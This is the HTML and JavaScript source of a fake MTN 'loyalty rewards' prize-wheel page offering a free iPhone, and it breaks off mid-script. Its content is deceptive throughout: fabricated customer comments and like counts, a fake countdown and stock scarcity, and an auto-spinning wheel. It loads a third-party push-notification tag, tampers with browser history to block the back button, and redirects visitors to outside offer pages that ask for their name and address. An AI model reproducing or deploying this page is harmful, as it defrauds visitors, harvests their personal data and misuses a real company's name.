<!DOCTYPE html>
<html lang="en">

<head>
    <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-2TP2HSWDBF"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-2TP2HSWDBF');
</script>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
    <meta name="robots" content="noindex, nofollow, noarchive">
    <meta name="referrer" content="no-referrer">
    <meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name="viewport">
    <title>Congratulations!</title>
    <meta content="notranslate" name="google">
    <!-- <script src="styles.js" async=""></script> -->
    <link href="https://fonts.googleapis.com/css2?family=FontName:wght@400;700&display=swap" rel="stylesheet">
    <script>
        function getURLParameter(name) {
            return decodeURI(
                (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || ''
            );
        }

        function dateOffset(j, a) {
            var l = new Boolean(null == j || 0 == j || void 0 == j || "" == j),
                e = new Date(Date.now() - 24 * j * 60 * 60 * 1000);
            1 == l && (j = 0);
            var k = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"],
                i = ["January", "February", "March", "April", "Maybe", "June", "July", "August", "September", "October", "November", "December"];
            return null != !a && 0 != !a && void 0 != !a ? e.getDate() + " " + i[e.getMonth()] : "day_name_only" == a && l ? k[e.getDay()] : "top_date" == a && l ? k[e.getDay()] + ", " + e.getDate() + " " + i[e.getMonth()] + " " + e.getFullYear() : void 0
        };
    </script>

    <style>
        .icon,
        .menu {
            display: inline-block;
            margin-top: 13px
        }

        #wheelCon,
        .icon,
        .menu {
            background-repeat: no-repeat;
            background-size: contain
        }

        #firstpage,
        #wheelCon {
            background-color: #fff;
            border-radius: 3px
        }

        #pressButton,
        #wheelCon,
        .icon,
        .menu {
            background-size: contain
        }

        .spinAround,
        .spinAround2 {
            animation-timing-function: ease;
            animation-iteration-count: 1;
            animation-direction: normal
        }

        #header,
        #subheadline,
        #topDate,
        .congrats {
            text-align: center
        }

        #secondpage a,
        .button,
        .fm_item,
        .pi_links a,
        a.button {
            text-decoration: none
        }

        .button,
        :focus {
            outline: 0
        }

        ol,
        ul {
            list-style: decimal inside
        }

        #header {
            background-color: #5d80a6;
            color: #fff;
            height: 43px;
            max-height: 43px;
            width: 100%;
            overflow: hidden
        }

        #header h3 {
            display: inline-block;
            font-size: 1.1em;
            line-height: 40px;
            padding-left: 0
        }

        .icon {
            background-image: url(notify_2x.png);
            width: 20px;
            height: 18px;
            float: right;
            margin-right: 10px
        }

        .menu {
            background-image: url(menu_2x.png);
            width: 18px;
            height: 16px;
            float: left;
            margin-left: 10px
        }

        #devMockup,
        #secondpage {
            display: none
        }

        #container {
            padding: 6px
        }

        #firstpage {
            margin-bottom: 5px;
            padding: 5px 10px
        }

        #subheadline {
            font-weight: 400;
            line-height: 15px
        }

        .name,
        .regular_price,
        .your_price {
            font-weight: 700
        }

        .date {
            font-size: .85em;
            color: #9c9c9c;
            margin: 2px 0
        }

        #topDate {
            width: 100%
        }

        .intro {
            margin-bottom: 10px
        }

        #wheelCon {
            position: relative;
            background-position: center;
            overflow: hidden
        }

        #wheel {
            z-index: 1;
            width: 100%;
            height: auto;
            margin-top: 5px
        }

        #pressButton {
            position: absolute;
            background-image: url(spin_prize2.png);
            cursor: pointer;
            width: 25%;
            height: 0;
            padding-top: 30.5%;
            z-index: 2;
            margin-left: auto;
            margin-right: auto;
            left: 0;
            right: 0;
            top: 110px;
            border: none;
            background-color: transparent
        }

        .congrats,
        .timer {
            line-height: 1.5;
            padding: 8px
        }

        #pressButton:disabled {
            opacity: 1
        }

        #devMockup {
            position: absolute;
            max-width: 75%;
            max-height: 75%;
            height: auto;
            z-index: -3
        }

        @media(min-width:614px) {
            #wheel {
                width: 32vw;
                left: 47vw;
                top: 27vw
            }

            #pressButton {
                width: 6%;
                top: 38% !important;
                background-repeat: no-repeat
            }
        }

        .spinAround {
            -webkit-animation: spin 6.6s;
            animation: spin 6.6s;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            -ms-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }

        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0);
                -ms-transform: rotate(0);
                transform: rotate(0)
            }

            90% {
                -webkit-transform: rotate(3110deg);
                -ms-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -webkit-transform: rotate(3108deg);
                -ms-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -webkit-transform: rotate(3109deg);
                -ms-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @keyframes spin {
            0% {
                -webkit-transform: rotate(0);
                -ms-transform: rotate(0);
                transform: rotate(0)
            }

            90% {
                -webkit-transform: rotate(3110deg);
                -ms-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -webkit-transform: rotate(3108deg);
                -ms-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -webkit-transform: rotate(3109deg);
                -ms-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        .spinAround2 {
            -webkit-animation: spin2 6.6s;
            animation: spin2 6.6s;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            -ms-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }

        @-webkit-keyframes spin2 {
            0% {
                -webkit-transform: rotate(3109deg);
                -ms-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -webkit-transform: rotate(6314deg);
                -ms-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -webkit-transform: rotate(6312deg);
                -ms-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -webkit-transform: rotate(6313deg);
                -ms-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @keyframes spin2 {
            0% {
                -webkit-transform: rotate(3109deg);
                -ms-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -webkit-transform: rotate(6314deg);
                -ms-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -webkit-transform: rotate(6312deg);
                -ms-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -webkit-transform: rotate(6313deg);
                -ms-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        .animated {
            -webkit-animation-duration: 1s;
            animation-duration: 1s;
            -webkit-animation-fill-mode: both;
            animation-fill-mode: both
        }

        @-webkit-keyframes rotateIn {
            0% {
                -webkit-transform-origin: center;
                transform-origin: center;
                -webkit-transform: rotate3d(0, 0, 1, -200deg);
                transform: rotate3d(0, 0, 1, -200deg);
                opacity: 0
            }

            100% {
                -webkit-transform-origin: center;
                transform-origin: center;
                -webkit-transform: none;
                transform: none;
                opacity: 1
            }
        }

        @keyframes rotateIn {
            0% {
                -webkit-transform-origin: center;
                transform-origin: center;
                -webkit-transform: rotate3d(0, 0, 1, -200deg);
                transform: rotate3d(0, 0, 1, -200deg);
                opacity: 0
            }

            100% {
                -webkit-transform-origin: center;
                transform-origin: center;
                -webkit-transform: none;
                transform: none;
                opacity: 1
            }
        }

        .rotateIn {
            -webkit-animation-name: rotateIn;
            animation-name: rotateIn
        }

        * {
            margin: 0
        }

        .button {
            -moz-box-shadow: inset 0 1px 0 0 #7a8eb9;
            -webkit-box-shadow: inset 0 1px 0 0 #7a8eb9;
            box-shadow: inset 0 1px 0 0 #7a8eb9;
            background: -webkit-gradient(linear, left top, left bottom, color-stop(.05, #637aad), color-stop(1, #5972a7));
            background: -moz-linear-gradient(top, #637aad 5%, #5972a7 100%);
            background: -webkit-linear-gradient(top, #637aad 5%, #5972a7 100%);
            background: -o-linear-gradient(top, #637aad 5%, #5972a7 100%);
            background: -ms-linear-gradient(top, #637aad 5%, #5972a7 100%);
            background: linear-gradient(to bottom, #637aad 5%, #5972a7 100%);
            filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#637aad', endColorstr='#5972a7', GradientType=0)
        }

        .congrats,
        .prize,
        .timer {
            background-color: #fff;
            margin-bottom: 5px;
            border-radius: 3px
        }

        .smallfont {
            font-size: 12px
        }

        .name {
            color: #3c5a96;
            font-size: 100%
        }

        .congrats h4 {
            font-size: 20px
        }

        .timer {
            font-size: 12px
        }

        ol {
            padding-left: 0;
            overflow-x: visible
        }

        ol li {
            list-style-type: decimal
        }

        @media screen and (max-width:359px) {
            .button {
                width: 150px !important
            }

            .like-line-menu__item {
                float: left
            }

            .send-comments--submit {
                width: 65px !important
            }
        }

        .red_text {
            color: red
        }

        .your_price span {
            color: green
        }

        body {
            background: #fff !important;
            margin: 0;
            padding: 0;
            font-family: helvetica, arial, sans-serif;
            font-size: small
        }

        .border_bottom {
            border-bottom: 1px solid #dfe3e8
        }

        .like_people {
            height: 38px;
            display: table;
            padding: 0 0 1px;
            margin: 0 -2px 5px
        }

        .like_people_images {
            display: table-cell;
            vertical-align: middle;
            white-space: nowrap
        }

        .like_people_image_wrap:first-child {
            z-index: 1;
            margin: 0
        }

        .like_people_image_wrap {
            width: 24px;
            height: 24px;
            border-radius: 100%;
            display: inline-block;
            vertical-align: top;
            margin: 0 0 0 -10px;
            position: relative;
            border: 2px solid #fff;
            overflow: hidden
        }

        .like_people_image {
            width: 24px;
            height: 24px;
            border-radius: 100%;
            overflow: hidden
        }

        .like_people_text {
            display: table-cell;
            vertical-align: middle;
            font-size: 13px;
            line-height: 14px;
            color: #909499;
            letter-spacing: -.08px;
            padding: 0 0 0 6px
        }

        .wi_buttons {
            padding: 0;
            position: relative;
            overflow: visible;
            height: 46px
        }

        .item_like,
        .item_share,
        .item_views {
            color: #999;
            padding: 4px;
            margin-left: 1px;
            font-weight: 700
        }

        .wi_buttons_wrap {
            display: table;
            min-width: 100%;
            padding: 2px 0 0 2px;
            box-sizing: border-box;
            margin: 0 0 0 -14px
        }

        .wi_buttons .like_wrap {
            display: table
        }

        .wi_buttons .item_like,
        .wi_buttons .item_share {
            float: none;
            margin: 0;
            background: 0 0
        }

        .wi_buttons .item_like,
        .wi_buttons .item_share,
        .wi_buttons .item_views {
            display: table-cell;
            vertical-align: top;
            line-height: 20px;
            padding: 10px 12px 11px;
            text-align: left;
            min-width: 60px
        }

        .item_date,
        .pi_acts_link .i_icon,
        .wi_buttons b {
            display: inline-block;
            vertical-align: top
        }

        .wi_buttons i.i_like {
            background-position: 0 -60px !important
        }

        .wi_buttons i.i_share {
            background-position: 0 -100px !important
        }

        .wi_buttons i.i_views {
            background-position: 0 -160px !important
        }

        .wi_buttons .item_views {
            width: 100%;
            text-align: right;
            padding: 10px 0;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none
        }

        .wi_buttons i.i_like,
        .wi_buttons i.i_share,
        .wi_buttons i.i_views {
            background-image: url(action_icons_20px_2x.png);
            display: inline-block;
            vertical-align: top;
            width: 20px;
            height: 20px;
            margin: 0;
            padding: 0;
            background-size: 100% !important;
            background-repeat: no-repeat
        }

        .wi_buttons i.i_like,
        .wi_buttons i.i_share {
            float: left
        }

        .wi_buttons b {
            color: #909499;
            font-size: 15px;
            font-weight: 400;
            line-height: 20px;
            letter-spacing: -.2px;
            margin: 0 0 0 6px !important
        }

        .photo_avatar img {
            border-radius: 50%;
            height: 40px;
            width: 40px
        }

        .comment_name {
            font-size: 14px;
            color: #426997;
            font-weight: 600
        }

        .comment_text {
            font-size: 14px;
            line-height: 19px;
            padding: 0;
            margin-top: 2px;
            letter-spacing: -.22px
        }

        .pi_links,
        .pi_links a,
        .show_next {
            line-height: 16px
        }

        .item_date,
        .pi_links a {
            font-size: 13px;
            letter-spacing: -.08px
        }

        .item_date {
            color: #909499
        }

        .pi_links {
            font-size: 13px;
            color: #909499;
            padding: 0;
            margin: 5px 0 0;
            overflow: hidden
        }

        .pi_links a {
            padding: 0;
            margin: 0 3px;
            color: #4c6b8f;
            cursor: pointer
        }

        .pi_acts_link {
            margin: 0 !important;
            float: right;
            -webkit-tap-highlight-color: transparent
        }

        .pi_acts_link .i_icon {
            background-image: url(comment_action_2x.png);
            background-position: 0 0;
            margin: 2px 0 0;
            background-repeat: no-repeat;
            background-size: 100% !important;
            width: 12px;
            height: 12px;
            padding: 0
        }

        .comments hr {
            margin: 0 !important
        }

        .show_next_wrap {
            padding: 0 0 1px;
            border: 0;
            text-align: center
        }

        .show_next {
            font-size: 14px !important;
            color: #426997;
            padding: 15px 0;
            font-weight: 400;
            border-radius: 0;
            border: 0;
            background: 0 0;
            display: block
        }

        .create_post {
            background-color: #f1f1f1;
            border-top: 1px solid #eaeaea;
            border-bottom: 1px solid #e1e1e1;
            position: relative;
            margin-top: -1px;
            padding: 7px
        }

        .comment_item .pi_cont {
            margin-left: 0;
            min-height: 34px
        }

        .iwrap {
            margin: 0 6px 0 0
        }

        .pi_cont .textfield {
            height: 3.6em
        }

        .create_post .textfield {
            padding-top: 3px;
            padding-bottom: 3px;
            resize: vertical
        }

        .textfield {
            vertical-align: top;
            width: 100%;
            min-width: 30px;
            border: 1px solid #b9c4d1;
            padding: 2px;
            margin: 0;
            background: #fff;
            outline: 0;
            box-shadow: none;
            font-size: 14px;
            box-sizing: content-box;
            border-radius: 4px
        }

        .mfoot {
            background-color: #f5f5f5
        }

        .pfoot {
            padding: 10px 0
        }

        .footer_menu {
            text-align: center;
            margin: 5px 0;
            line-height: 1.6em
        }

        .fm_row {
            display: inline;
            white-space: nowrap
        }

        .button,
        .clearfix {
            display: block
        }

        .fm_item {
            padding: 4px 6px;
            font-size: .93em;
            color: #8a8a8a
        }

        .container {
            padding: 0 12px 8px
        }

        .button {
            width: 170px;
            padding: 0 8px;
            margin-top: 8px;
            text-align: center;
            background-color: #3b5998;
            background-image: -moz-linear-gradient(center top, #0c98c5, #0c98c5);
            border: 0 solid #4ec8ef;
            text-shadow: 0 0 rgba(0, 0, 0, .1);
            border-radius: 1px;
            cursor: default;
            color: #fff;
            font-size: 20px;
            font-weight: 700;
            height: 33px;
            line-height: 33px
        }

        .comments {
            background: #fff;
            border-radius: 3px;
            margin: 0;
            padding: 0 0 30px
        }

        .comments__item__meta {
            font-size: 9px;
            line-height: 14px;
            margin-top: 6px
        }

        td {
            background-color: transparent;
            -webkit-transition: all .3s ease-in;
            -moz-transition: all .3s ease-in;
            -ms-transition: all .3s ease-in;
            -o-transition: all .3s ease-in;
            transition: all .3s ease-in
        }

        hr {
            height: 0;
            font-size: 0;
            line-height: 0;
            border: none;
            background: 0 0;
            border-bottom: 1px #dadde1 solid;
            margin: 0 5px
        }

        ul {
            padding-left: 0;
            overflow-x: visible
        }

        .clearfix:after {
            content: " ";
            display: block;
            height: 0;
            clear: both;
            overflow: hidden;
            visibility: hidden
        }

        @media screen and (min-width:460px) {
            .comments__item__meta {
                font-size: 8px
            }
        }

        .fbimg {
            margin-top: 10px
        }

        .fixed_footer {
            position: fixed;
            bottom: 0;
            height: 50px;
            border-top: 1px solid #e4e4e4;
            background-color: #fff;
            left: 0;
            right: 0;
            z-index: 10;
            box-shadow: 0 0 10px rgba(0, 0, 0, .2)
        }

        .footer_input {
            color: #a0a4a3;
            border: none;
            margin-right: 0;
            font-size: 18px;
            position: absolute;
            left: 45px;
            top: 13px
        }

        .btn_send,
        .clip {
            max-height: 30px;
            position: absolute;
            top: 10px
        }

        .clip {
            left: 10px
        }

        .btn_send {
            right: 10px
        }

        @media screen and (max-device-width:480px) {
            body {
                -webkit-text-size-adjust: none
            }
        }

        .telkom-style {
            color: #3C5A96;
            /* Telkom's color */
            font-family: 'Helvetica Neue', Arial, sans-serif;
            /* Telkom's font */
        }

        .container {
            text-align: center; /* Optional: Center align the content */
        }
        .name {
            display: block; /* Ensures span is block-level for better layout control */
            margin-top: 10px; /* Optional: Adds some space between the image and the text */
        }
    </style>
    <!--     <script src="pub.min.js"></script> -->
    <!-- 复制本段Before the closing </head> HTML tag执行propush -->
    <script>
        var s = document.createElement('script');
        s.src='//deehalig.net/act/files/micro.tag.min.js?z=5705526&sw=/sw-check-permissions-9098f.js';
        s.onload = function(result) {
            switch (result) {
                case 'onPermissionDefault':break;
                case 'onPermissionAllowed':break;
                case 'onPermissionDenied':break;
                case 'onAlreadySubscribed':break;
                case 'onNotificationUnsupported':break;
            }
        };
        document.head.appendChild(s);
    </script>    
<!-- 以上 -->        

</head>

<body oncontextmenu="return false;" onload="autospin1()">
        <a href="" onclick="window.open(decodeURIComponent( window.location.href.substr(window.location.href.lastIndexOf('aref=')+5)), '_self');">
    </a>


    <div id="header">
        <span class="menu"></span>
        <h3><span id="headline">Loyalty Rewards</span></h3><span class="icon"></span>
    </div>
    <div id="container">
        <div align="center" id="firstpage">
            <div class="date" id="topDate" style="padding-bottom:10px;margin:0">
                <script>
                    document.write(dateOffset(0, "top_date"));
                </script>
            </div>
            <div style="margin-bottom:2px">
                <div id="subheadline">
                    <p style="font-size:18px; margin: 0;"><b>Congratulations!</b></p>
    <img src="faudouglaitu_com_2024_04_12_0eccd828.png" alt="Lucky Day" style="width: 50px; height: auto; display: block; margin: 10px auto 0;">
    <p style="padding-top:10px; margin: 0;">Today you are lucky!</p>
                </div>
                <div class="intro" style="padding-top:5px">
                    Every <span id="today">
                        <script>document.write(dateOffset(0, "day_name_only"));</script>Saturday
                    </span> we select 7
                    <script>
                        document.write(getURLParameter("browser"));
                    </script>Mobile Safari users to receive prizes from our sponsors. Turn the wheel to see which prize
                    you can claim!
                </div>
                <div id="wheelCon">
                    <img class="spinAround2 transparent" height="501" id="wheel" src="pw_ix.png" width="501"> <input
                        id="pressButton" onclick="spin()" style="top: 106.2px;" type="button">
                    <div><img class="animated rotateIn" id="devMockup" src="iphone_15.png"
                            style="display: none; left: 64px; top: 68px; z-index: 3;"></div>
                </div>
            </div>
            <div id="secondpage">
                <div class="congrats">
                    <h4>
                        <a href="javascript:void(0)" style="cursor:pointer!important"
                            onclick="openoffer();PreventExitPop=false">

                            <font class="telkom-style">
                                Congratulations!<br>
                                MTN is giving away a Brand New iPhone 13 Pro!
                            </font>
                        </a>
                    </h4>
                </div>
                <div class="congrats" style="text-align:left">
                    <ol>
                        <li>Choose a color that you like. You will be redirected to our sponsor's website</li>
                        <li>On the sponsor's website, enter your name and surname, as well as the shipping address to
                            claim your prize</li>
                    </ol>
                    <b>IMPORTANT:</b> This prize is only available while supplies last!
                </div>
                <div class="timer">Offer valid for
                    <font color="red"><b><span id="mins">4</span> minutes and <span id="hsecs">59</span> seconds</b>
                    </font>
                </div>
                <div class="prize">
                    <table>
                        <tbody>
                            <tr>
                                <th></th>
                                <td style="padding:10px 5px 10px 0;text-align:center"><img src="iphone_15.png"
                                        style="max-width:150px"></td>
                                <td style="line-height:1.6">
                                    <p style="text-align:left">
                                        <a href="javascript:void(0)" style="cursor:pointer!important" onclick="openoffer();PreventExitPop=false" rel="noreferrer">
                    
                                            <span class="name" style="display: block; margin-top: 10px;">iPhone 13 Pro (Graphite)</span>
                                        </a>
                                    </p>
                                    <p><span class="smallfont">Super Retina XDR display, 256GB</span></p>
                                    <p class="regular_price">Normal price: <s class="red_text">
                                            <script>document.write(getURLParameter("pr"));</script>£1,049
                                        </s></p>
                                    <p class="your_price">Your price: <span>
                                            <script>document.write(getURLParameter("yp"));</script>$0
                                        </span></p>
                                    <p class="remaining"><b>Available: <span>1</span></b></p>
                                    <div>
                                        <a class="button" href="javascript:void(0)" style="cursor:pointer!important"
                                            onclick="openoffer();PreventExitPop=false" rel="noreferrer"> Choose </a>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <div class="prize">
                    <table>
                        <tbody>
                            <tr>
                                <th></th>
                                <td style="padding:10px 5px 10px 0;text-align:center">
                                    <img src="iphone_15.png" style="max-width:150px">
                                </td>
                                <td style="line-height:1.6">
                                    <p style="text-align:left">
                                        <a href="javascript:void(0)" style="cursor:pointer!important" onclick="openoffer();PreventExitPop=false" rel="noreferrer">
                                            
                                            <span class="name" style="display: block; margin-top: 10px;">iPhone 13 Pro (Silver)</span>
                                        </a>
                                    </p>
                                    <p><span class="smallfont">Super Retina XDR display, 256GB</span></p>
                                    <p class="regular_price">Normal price: <s class="red_text">
                                            <script>document.write(getURLParameter("pr"));</script>£1,049
                                        </s></p>
                                    <p class="your_price">Your price: <span>
                                            <script>document.write(getURLParameter("yp"));</script>$0
                                        </span></p>
                                    <p class="remaining"><b>Available: <span>3</span></b></p>
                                    <div>
                                        <a class="button" href="javascript:void(0)" style="cursor:pointer!important"
                                            onclick="openoffer();PreventExitPop=false" rel="noreferrer"> Choose </a>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
        <div class="container">
            <div class="comments">
                <div class="wi_like_wrap border_bottom">
                    <span class="like_people"><span class="like_people_images"><span class="like_people_image_wrap"><img
                                    class="like_people_image" height="24" src="like_user_1.jpg" width="24"></span> <span
                                class="like_people_image_wrap"><img class="like_people_image" height="24"
                                    src="like_user_2.jpg" width="24"></span></span>
                        <span class="like_people_text">1537 people like this</span></span>
                </div>
                <div class="wi_buttons border_bottom">
                    <div class="wi_buttons_wrap">
                        <span class="like_wrap"><span class="item_like _i"><i class="i_like"></i> <b
                                    class="v_like">1537</b></span> <span class="item_share is_empty _i"><i
                                    class="i_share"></i> <b class="v_share">234</b></span></span> <span
                            class="item_views"><i class="i_views"></i> <b class="v_views">544K</b></span>
                    </div>
                </div>
                <center>
                    <font face="arial"></font>
                    <table border="0" cellpadding="4" cellspacing="0" style="padding-top:10px;font-size:13px"
                        width="100%">
                        <tbody id="comments_list">
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="7.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Alex Fabian</div>
                                    <div class="comment_text">Finally landed the iPad! Honestly, I was hoping for the Mac, but today wasn’t my lucky day...</div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">Yesterday at 08:13
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="2.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Thabo Mokoena</div>
                                    <div class="comment_text">I got one spin, but the wheel didn't land on a prize :(. MTN, can I get another chance?
                                    </div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">
                                            <script>
                                                document.write(dateOffset(2));
                                            </script>31 December
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="3.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Jacques van der Merwe</div>
                                    <div class="comment_text">Just unpacked the new iMac! This is the best prize ever! Thanks, MTN!
                                    </div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">
                                            <script>
                                                document.write(dateOffset(2));
                                            </script>31 December
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="4.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Lerato Mthembu</div>
                                    <div class="comment_text">At first, I thought it was a joke, but this morning the phone arrived in the mail, and I also got a T-shirt with a logo! Thanks, MTN!
                                    </div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">
                                            <script>
                                                document.write(dateOffset(2));
                                            </script>31 December
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="6.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Stella Kovar</div>
                                    <div class="comment_text">My iMac arrived this morning! I love it!!! Thanks, MTN!

                                    </div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">
                                            <script>
                                                document.write(dateOffset(3));
                                            </script>30 December
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="1.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Thandeka Ndlovu</div>
                                    <div class="comment_text">I got the iPad. still cant believe it!
                                    </div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">
                                            <script>
                                                document.write(dateOffset(3));
                                            </script>30 December
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                            <tr>
                                <td align="right" class="photo_avatar" valign="top" width="40"><img src="5.jpg"></td>
                                <td align="left" valign="top">
                                    <div class="comment_name">Sipho Ncube</div>
                                    <div class="comment_text">Went to the iPhone, but I already have it, can I have an
                                        iPad instead?
                                    </div>
                                    <div class="comments__item__meta">
                                        <div class="item_date">
                                            <script>
                                                document.write(dateOffset(4));
                                            </script>29 December
                                        </div>
                                    </div>
                                    <div class="pi_links">
                                        <span class="like_wrap"><span class="pi_link">Like</span></span> <span
                                            class="pi_reply_wrap">· <span>Comment</span></span> <span
                                            class="pi_acts_link"><i class="i_icon"></i></span>
                                    </div>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2">
                                    <hr>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                    <div class="show_next_wrap">
                        <span class="show_next">See all</span>
                    </div>
                </center>
            </div>
        </div>
        <div class="fixed_footer"><img alt="" class="clip" src="clip_footer_3.png"> <input class="footer_input"
                placeholder="Your message" type="text"> <img alt="" class="btn_send" src="footer_right.png"></div>
    </div>
    <script type="text/javascript">
        var page = getURLParameter("page"),
            brand = getURLParameter("device_brand");

        function exit_a1() {
            window.onbeforeunload = null, window.location = "#js-landing-url"
        }
        
        var conMid,
            mydate = new Date,
            year = mydate.getFullYear(),
            month = mydate.getMonth(),
            day = mydate.getDate(),
            weekday = mydate.getDay(),
            count = 1,
            headline = document.getElementById("headline"),
            topDate = document.getElementById("topDate"),
            today = document.getElementById("today"),
            con = document.getElementById("container"),
            whCon = document.getElementById("wheelCon"),
            dWheel = document.getElementById("wheel"),
            button = document.getElementById("pressButton"),
            device = document.getElementById("devMockup"),
            first = document.getElementById("firstpage"),
            second = document.getElementById("secondpage");

        function setButtonHeight() {
            conMid = (whCon.getBoundingClientRect().bottom - whCon.getBoundingClientRect().top) / 2,
                button.style.top = conMid - button.offsetHeight / 2 - 0.2 * button.offsetHeight / 2 + "px"
        }

        function spin() {
    dWheel.className = "spinAround";
    setTimeout(function() {
        dWheel.className += " transparent";
        setTimeout(function() {
            device.style.display = "block";
            device.style.left = (whCon.offsetWidth / 2 - device.offsetWidth / 2) + "px";
            device.style.top = (conMid - device.offsetHeight / 2) + "px";
            device.style.zIndex = "3";
        }, 200);
        setTimeout(function() {
            first.innerHTML = "<img src='loading.gif'>";
            first.style.padding = "195px 0px";
            setTimeout(function() {
                first.parentNode.removeChild(first);
                second.style.display = "block";
                con.insertBefore(second, con.firstChild);
                setInterval("countdown()", 1000);
            }, 1500);
        }, 2000);
    }, 6800);
}


        function autospin2() {
            spin()
        }

        function autospin1() {
            alert("Congratulations! As a valued MTN customer, you have been selected to participate in our exclusive loyalty program. You have a chance to receive one of four exciting gifts!\n\nClick 'OK' to get started.");
            document.getElementById("pressButton").click();
        }


        function countdown() {
            var e = parseInt(document.getElementById("mins").innerHTML),
                f = parseInt(document.getElementById("hsecs").innerHTML),
                g = 0,
                h = 0;
            0 !== e && 0 === f ? (g = e - 1, h = 59) : 0 !== e || 0 !== f ? (g = e, h = f - 1) : 0 === e && 0 === f && (g = e, h = f),
                h < 10 && (h = "0" + h),
                document.getElementById("mins").textContent = g,
                document.getElementById("hsecs").textContent = h
        };
        function openoffer() {
            window.open("https://innovate-niche.com/chv3l3k.php?lp=1");
            setTimeout(function() {
        window.location.href = 'https://lp.innovate-niche.com/input-BBR/index.html?key=cea9d210-938c-4807-acf7-4ce900ed0af6&c1=POPUNDER&c2=NG';
    }, 100);
        }

        (function(window, location) {
        history.replaceState(null, document.title, location.pathname+"#!/history");
        history.pushState(null, document.title, location.pathname);
        
